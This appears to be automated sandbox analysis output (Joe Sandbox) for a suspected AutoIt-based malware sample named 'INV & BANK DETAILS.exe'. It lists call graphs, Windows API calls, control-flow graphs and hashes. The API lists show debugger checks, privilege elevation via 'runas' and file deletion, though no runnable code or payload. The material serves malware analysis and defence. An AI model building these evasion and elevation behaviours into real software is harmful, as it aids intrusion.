4679dc 88493->88496 88498 4115d7 52 API calls 88494->88498 88499 4115d7 52 API calls 88495->88499 88500 4679e6 88496->88500 88878 44ae3e CloseHandle moneypunct 88496->88878 88501 467928 88497->88501 88504 467a31 88498->88504 88505 467a49 88499->88505 88501->88502 88507 46792f 88501->88507 88502->88475 88503 467964 88502->88503 88503->88354 88876 4335cd 56 API calls 3 library calls 88507->88876 88568 4533eb 88517->88568 88520 4750ee 88522 408f40 VariantClear 88520->88522 88521 475129 88572 4646e0 88521->88572 88530 4750f5 88522->88530 88524 47515e 88525 475162 88524->88525 88552 47518e 88524->88552 88530->88372 88569 453404 88568->88569 88570 4533f8 88568->88570 88569->88520 88569->88521 88570->88569 88644 4531b1 85 API calls 5 library calls 88570->88644 88645 4536f7 53 API calls 88572->88645 88574 4646fc 88646 4426cd 59 API calls _wcslen 88574->88646 88576 464711 88578 40bc70 52 API calls 88576->88578 88584 46474b 88576->88584 88579 46472c 88578->88579 88647 461465 52 API calls _memmove 88579->88647 88581 464741 88582 40c600 52 API calls 88581->88582 88582->88584 88583 464793 88583->88524 88584->88583 88648 463ad5 64 API calls __wcsicoll 88584->88648 88644->88569 88645->88574 88646->88576 88647->88581 88648->88583 88699 443d73 88663->88699 88667 46eac5 88666->88667 88668 46eaac 88666->88668 88729 45f72f 54 API calls 88667->88729 88670 46eab1 88668->88670 88671 46eabb 88668->88671 88713 4689aa 88670->88713 88721 46ea4a 88671->88721 88673 46eaca 88673->88410 88677->88389 88679 40da20 CloseHandle 88678->88679 88680 40de4e 88679->88680 88761 40f110 88680->88761 88691->88412 88692->88411 88695 40da37 88694->88695 88696 40da29 88694->88696 88695->88696 88697 40da3c CloseHandle 88695->88697 88696->88420 88697->88420 88698->88418 88704 40df90 88699->88704 88702 40df90 2 API calls 88703 443da5 88702->88703 88703->88397 88710 40dfa2 88704->88710 88705 425e30 88712 40e050 SetFilePointerEx 88705->88712 88706 40e01b SetFilePointerEx 88711 40e050 SetFilePointerEx 88706->88711 88709 40dff3 88709->88702 88710->88705 88710->88706 88710->88709 88711->88709 88712->88709 88730 40d370 88713->88730 88722 40d370 52 API calls 88721->88722 88723 46ea59 88722->88723 88729->88673 88731 4115d7 52 API calls 88730->88731 88762 40f125 CreateFileW 88761->88762 88763 42630c 88761->88763 88765 40de74 88762->88765 88764 426311 CreateFileW 88763->88764 88763->88765 88764->88765 88864->88447 88875->88492 88877->88479 88878->88500 88880->88184 88881->88096 88882->88101 88883->88150 88884->88213 88885->88150 88886->88120 88887->88146 88888->88112 88889->88116 88890->88121 88891->88177 88892->88177 88893->88177 88894->88177 88895->88134 88896->88152 88897->88139 88898->88170 88899->88191 88900->88191 88901->88191 88902->88184 88903->88199 88904->88210 88905->88203 88906->88208 88907->88216 88908->88216 88909->88152 88910->88106 88911 3cd23f8 88925 3cd0048 88911->88925 88913 3cd24b7 88928 3cd22e8 88913->88928 88931 3cd34e8 GetPEB 88925->88931 88927 3cd06d3 88927->88913 88929 3cd22f1 Sleep 88928->88929 88930 3cd22ff 88929->88930 88932 3cd3512 88931->88932 88932->88927 88933 42d154 88934 480a8d 259 API calls 88933->88934 88935 42d161 88934->88935 88936 480a8d 259 API calls 88935->88936 88936->88935 88937 42b14b 88944 40bc10 88937->88944 88939 42b159 88940 4096a0 398 API calls 88939->88940 88941 42b177 88940->88941 88955 44b92d VariantClear 88941->88955 88943 42bc5b 88945 40bc24 88944->88945 88946 40bc17 88944->88946 88948 40bc2a 88945->88948 88949 40bc3c 88945->88949 88956 408e80 VariantClear 88946->88956 88957 408e80 VariantClear 88948->88957 88952 4115d7 52 API calls 88949->88952 88950 40bc1f 88950->88939 88954 40bc43 88952->88954 88953 40bc33 88953->88939 88954->88939 88955->88943 88956->88950 88957->88953 88958 425b2b 88963 40f000 88958->88963 88962 425b3a 88964 4115d7 52 API calls 88963->88964 88965 40f007 88964->88965 88966 4276ea 88965->88966 88972 40f030 88965->88972 88971 41130a 51 API calls __cinit 88971->88962 88973 40f039 88972->88973 88974 40f01a 88972->88974 89002 41130a 51 API calls __cinit 88973->89002 88976 40e500 88974->88976 88977 40bc70 52 API calls 88976->88977 88978 40e515 GetVersionExW 88977->88978 88979 402160 52 API calls 88978->88979 88980 40e557 88979->88980 89003 40e660 88980->89003 88986 427674 88990 4276c6 GetSystemInfo 88986->88990 88988 40e5e0 88991 4276d5 GetSystemInfo 88988->88991 89017 40efd0 88988->89017 88989 40e5cd GetCurrentProcess 89024 40ef20 LoadLibraryA GetProcAddress 88989->89024 88990->88991 88995 40e629 89021 40ef90 88995->89021 88998 40e641 FreeLibrary 88999 40e644 88998->88999 89000 40e653 FreeLibrary 88999->89000 89001 40e656 88999->89001 89000->89001 89001->88971 89002->88974 89004 40e667 89003->89004 89005 42761d 89004->89005 89006 40c600 52 API calls 89004->89006 89007 40e55c 89006->89007 89008 40e680 89007->89008 89009 40e687 89008->89009 89010 427616 89009->89010 89011 40c600 52 API calls 89009->89011 89012 40e566 89011->89012 89012->88986 89013 40ef60 89012->89013 89014 40e5c8 89013->89014 89015 40ef66 LoadLibraryA 89013->89015 89014->88988 89014->88989 89015->89014 89016 40ef77 GetProcAddress 89015->89016 89016->89014 89018 40e620 89017->89018 89019 40efd6 LoadLibraryA 89017->89019 89018->88990 89018->88995 89019->89018 89020 40efe7 GetProcAddress 89019->89020 89020->89018 89025 40efb0 LoadLibraryA GetProcAddress 89021->89025 89023 40e632 GetNativeSystemInfo 89023->88998 89023->88999 89024->88988 89025->89023 89026 425b5e 89031 40c7f0 89026->89031 89030 425b6d 89066 40db10 52 API calls 89031->89066 89033 40c82a 89067 410ab0 6 API calls 89033->89067 89035 40c86d 89036 40bc70 52 API calls 89035->89036 89037 40c877 89036->89037 89038 40bc70 52 API calls 89037->89038 89039 40c881 89038->89039 89040 40bc70 52 API calls 89039->89040 89041 40c88b 89040->89041 89042 40bc70 52 API calls 89041->89042 89043 40c8d1 89042->89043 89044 40bc70 52 API calls 89043->89044 89045 40c991 89044->89045 89068 40d2c0 52 API calls 89045->89068 89047 40c99b 89069 40d0d0 53 API calls 89047->89069 89049 40c9c1 89050 40bc70 52 API calls 89049->89050 89051 40c9cb 89050->89051 89070 40e310 53 API calls 89051->89070 89053 40ca28 89054 408f40 VariantClear 89053->89054 89055 40ca30 89054->89055 89056 408f40 VariantClear 89055->89056 89057 40ca38 GetStdHandle 89056->89057 89058 429630 89057->89058 89059 40ca87 89057->89059 89058->89059 89060 429639 89058->89060 89065 41130a 51 API calls __cinit 89059->89065 89071 4432c0 57 API calls 89060->89071 89062 429641 89072 44b6ab CreateThread 89062->89072 89064 42964f CloseHandle 89064->89059 89065->89030 89066->89033 89067->89035 89068->89047 89069->89049 89070->89053 89071->89062 89072->89064 89073 44b5cb 58 API calls 89072->89073 89074 425b6f 89079 40dc90 89074->89079 89078 425b7e 89080 40bc70 52 API calls 89079->89080 89081 40dd03 89080->89081 89088 40f210 89081->89088 89083 426a97 89085 40dd96 89085->89083 89086 40ddb7 89085->89086 89091 40dc00 52 API calls 2 library calls 89085->89091 89087 41130a 51 API calls __cinit 89086->89087 89087->89078 89092 40f250 RegOpenKeyExW 89088->89092 89090 40f230 89090->89085 89091->89085 89093 425e17 89092->89093 89094 40f275 RegQueryValueExW 89092->89094 89093->89090 89095 40f2c3 RegCloseKey 89094->89095 89096 40f298 89094->89096 89095->89090 89097 40f2a9 RegCloseKey 89096->89097 89098 425e1d 89096->89098 89097->89090
                                APIs
                                • _wcslen.LIBCMT ref: 004096C1
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • _memmove.LIBCMT ref: 0040970C
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                • _memmove.LIBCMT ref: 00409D96
                                • _memmove.LIBCMT ref: 0040A6C4
                                • _memmove.LIBCMT ref: 004297E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                • String ID:
                                • API String ID: 2383988440-0
                                • Opcode ID: 27bffd3e1947c4510e6972f1f565318e64fccf5ab022684a44ee13d7cdcec7e9
                                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                • Opcode Fuzzy Hash: 27bffd3e1947c4510e6972f1f565318e64fccf5ab022684a44ee13d7cdcec7e9
                                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                Control-flow Graph

                                APIs
                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INV & BANK DETAILS.exe,00000104,?), ref: 00401F4C
                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\INV & BANK DETAILS.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                • String ID: C:\Users\user\Desktop\INV & BANK DETAILS.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                • API String ID: 2495805114-3662119242
                                • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2087 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2096 40e582-40e583 2087->2096 2097 427674-427679 2087->2097 2100 40e585-40e596 2096->2100 2101 40e5ba-40e5cb call 40ef60 2096->2101 2098 427683-427686 2097->2098 2099 42767b-427681 2097->2099 2103 427693-427696 2098->2103 2104 427688-427691 2098->2104 2102 4276b4-4276be 2099->2102 2105 427625-427629 2100->2105 2106 40e59c-40e59f 2100->2106 2119 40e5ec-40e60c 2101->2119 2120 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2101->2120 2121 4276c6-4276ca GetSystemInfo 2102->2121 2103->2102 2110 427698-4276a8 2103->2110 2104->2102 2112 427636-427640 2105->2112 2113 42762b-427631 2105->2113 2108 40e5a5-40e5ae 2106->2108 2109 427654-427657 2106->2109 2115 40e5b4 2108->2115 2116 427645-42764f 2108->2116 2109->2101 2114 42765d-42766f 2109->2114 2117 4276b0 2110->2117 2118 4276aa-4276ae 2110->2118 2112->2101 2113->2101 2114->2101 2115->2101 2116->2101 2117->2102 2118->2102 2122 40e612-40e623 call 40efd0 2119->2122 2123 4276d5-4276df GetSystemInfo 2119->2123 2120->2119 2131 40e5e8 2120->2131 2121->2123 2122->2121 2128 40e629-40e63f call 40ef90 GetNativeSystemInfo 2122->2128 2133 40e641-40e642 FreeLibrary 2128->2133 2134 40e644-40e651 2128->2134 2131->2119 2133->2134 2135 40e653-40e654 FreeLibrary 2134->2135 2136 40e656-40e65d 2134->2136 2135->2136
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                • FreeLibrary.KERNEL32(?), ref: 0040E642
                                • FreeLibrary.KERNEL32(?), ref: 0040E654
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                • String ID: 0SH$Wu
                                • API String ID: 3363477735-1135818761
                                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                APIs
                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: IsThemeActive$uxtheme.dll
                                • API String ID: 2574300362-3542929980
                                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                APIs
                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: FreeInfoLibraryParametersSystem
                                • String ID: Wu
                                • API String ID: 3403648963-4083010176
                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
                                • FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: FileFind$AttributesCloseFirst
                                • String ID:
                                • API String ID: 48322524-0
                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                • TranslateMessage.USER32(?), ref: 00409556
                                • DispatchMessageW.USER32(?), ref: 00409561
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Message$Peek$DispatchSleepTranslate
                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                • API String ID: 1762048999-758534266
                                • Opcode ID: 69bafca5d408916e74ea07af5abce12c4e64ced7c2932eb1db3ac477afef5aa5
                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                • Opcode Fuzzy Hash: 69bafca5d408916e74ea07af5abce12c4e64ced7c2932eb1db3ac477afef5aa5
                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1230 452ac7-452b53 call 422240 call 442c5a call 4150d1 call 41313c 1239 452c30-452c3a call 452719 1230->1239 1240 452b59-452b6a call 452719 1230->1240 1244 452c3f-452c41 1239->1244 1245 452b6c-452b77 1240->1245 1246 452b7a-452c2e call 413a0e call 411567 call 411536 call 413a0e call 411536 * 2 1240->1246 1244->1245 1247 452c47-452d18 call 414d04 * 8 call 431e1f call 4149c2 1244->1247 1246->1247 1280 452d28-452d43 call 442bb4 1247->1280 1281 452d1a-452d25 1247->1281 1284 452de2-452df7 call 414a46 1280->1284 1285 452d49 1280->1285 1291 452e15-452e1a 1284->1291 1292 452df9-452e12 DeleteFileW 1284->1292 1287 452d51-452d59 1285->1287 1289 452d5f 1287->1289 1290 452d5b-452d5d 1287->1290 1293 452d64-452d86 call 414d04 1289->1293 1290->1293 1294 452ea6-452ebb CopyFileW 1291->1294 1295 452e20-452e81 call 431e9e call 431e71 call 44b1a9 1291->1295 1301 452da9-452dcc call 432229 call 4142b6 1293->1301 1302 452d88-452da7 call 442c29 1293->1302 1297 452ebd-452ed6 DeleteFileW 1294->1297 1298 452ed9-452ef5 DeleteFileW call 431ddb 1294->1298 1314 452e86-452e88 1295->1314 1308 452efa-452f02 1298->1308 1315 452dd1-452ddc 1301->1315 1302->1301 1314->1298 1316 452e8a-452ea3 DeleteFileW 1314->1316 1315->1284 1317 452d4b-452d4d 1315->1317 1317->1287
                                APIs
                                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                • _fseek.LIBCMT ref: 00452B3B
                                • __wsplitpath.LIBCMT ref: 00452B9B
                                • _wcscpy.LIBCMT ref: 00452BB0
                                • _wcscat.LIBCMT ref: 00452BC5
                                • __wsplitpath.LIBCMT ref: 00452BEF
                                • _wcscat.LIBCMT ref: 00452C07
                                • _wcscat.LIBCMT ref: 00452C1C
                                • __fread_nolock.LIBCMT ref: 00452C53
                                • __fread_nolock.LIBCMT ref: 00452C64
                                • __fread_nolock.LIBCMT ref: 00452C83
                                • __fread_nolock.LIBCMT ref: 00452C94
                                • __fread_nolock.LIBCMT ref: 00452CB5
                                • __fread_nolock.LIBCMT ref: 00452CC6
                                • __fread_nolock.LIBCMT ref: 00452CD7
                                • __fread_nolock.LIBCMT ref: 00452CE8
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                • __fread_nolock.LIBCMT ref: 00452D78
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                • String ID:
                                • API String ID: 2054058615-0
                                • Opcode ID: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
